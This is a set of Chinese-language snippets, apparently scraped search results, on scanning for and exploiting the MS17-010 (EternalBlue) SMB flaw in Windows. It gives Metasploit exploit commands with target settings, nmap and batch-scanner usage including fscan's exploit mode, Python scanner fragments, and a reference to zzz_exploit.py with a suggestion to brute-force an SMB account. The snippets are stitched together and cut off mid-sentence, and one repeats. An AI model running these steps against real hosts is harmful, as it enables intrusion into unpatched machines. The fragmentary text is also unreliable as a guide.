一.先用Router Scan 扫描 看清楚了网络拓扑结构。 二.使用MS17-010批量扫描工具 下载:ms17-010Scan.exe(也可以用kali自带的nmap和ms17-10模块扫) 三.漏洞利用 kali 终端输入 msfconsole search ms17-010 要是搜不到,请更新你的msf use exploit/windows/smb/ms17_010_eternalblue set RHOST 192.168.1.66 设...
print str(e.message) if remote_server != '': t1 = datetime.now() pool = ThreadPool(processes=5) results = pool.map(scan_port, ip_list) pool.close() pool.join() else: print '请输入ip段!' exit(0) print '[*] >MS17-010扫描完成时间:', datetime.now() - t1标签...
MS_17_010_Scan.zip:https://bbs.ichunqiu.com/thread-40308-1-1.html 描述: 工具的使用步骤如下: 解压后在命令行下执行MS_17_010_Scan.exe,支持-ip 和-file两种参数。 -ip参数可以指定IP扫描,同时支持IP段扫描: MS_17_010_Scan.exe -ip 192.168.44.129 MS_17_010_Scan.exe -ip 192.168.44.129 192...
nmap -p445 –script smb-vuln-ms17-010 192.168.119.1/24 代码语言:javascript 代码运行次数:0 运行 AI代码解释 root@liuwx:~# nmap-p445--script smb-vuln-ms17-010192.168.119.1/24Starting Nmap7.70(https://nmap.org)at2019-10-1021:10CSTNmap scan reportfor192.168.119.1Host isup(0.00053s latency)...
利用的漏洞:ms17_010 需要用到的工具 nmap Metasploit 渗透过程: 扫描目标机器 # nmap -sV 192.168.1.107 Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-12 21:38 CST Nmap scan report for 192.168.1.107 Host is up (0.00030s latency). ...
exe --TargetIp %1 --OutConfig 1.txt check.bat 192.168.0.28 Ladon Ladon.exe 192.168.0.28 MS17010 fscan fscan -h 192.168.0.28 总之方法有很多,选择自己喜欢的 MS17010利用 有防火墙 参考: 本人没成功,终究还是太菜了 【MS17010打法】 https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=...
Ladon.exe 192.168.0.28 MS17010 fscan fscan -h 192.168.0.28 总之方法有很多,选择自己喜欢的 MS17010利用 有防火墙 参考: 本人没成功,终究还是太菜了 【MS17010打法】https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff ...
(ms17010等) 4.Web探测功能: webtitle探测 web指纹识别(常见cms、oa框架等) web漏洞扫描(weblogic、st2等,支持xray的poc) 5.漏洞利用: redis写公钥或写计划任务 ssh命令执行 6.其他功能: 文件保存 usege 简单用法 fscan.exe -h 192.168.1.1/24 (默认使用全部模块) fscan.exe -h 192.168.1.1/16 (B段...
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add 方法6: zzz_exploit.py github地址:https://github.com/worawit/MS17-010 该脚本有几个关键点需要注意: 1、 需要有一个系统可登陆的smb账户,可通过爆破等方式获取 2、需要有一个管道名。常见的管道名如下: ...
ms17010scan-h-n-amd64-1.exe INIT Jun 16, 2017 ms17_010_scan.py INIT Jun 16, 2017 ms17_010_scan ms17_010的批量扫描工具 因为Fuzzbunch的运行环境是Python2.6,所以站在巨人的肩膀上改了一个Python2.6的支持批量扫描ms17_010工具。 用法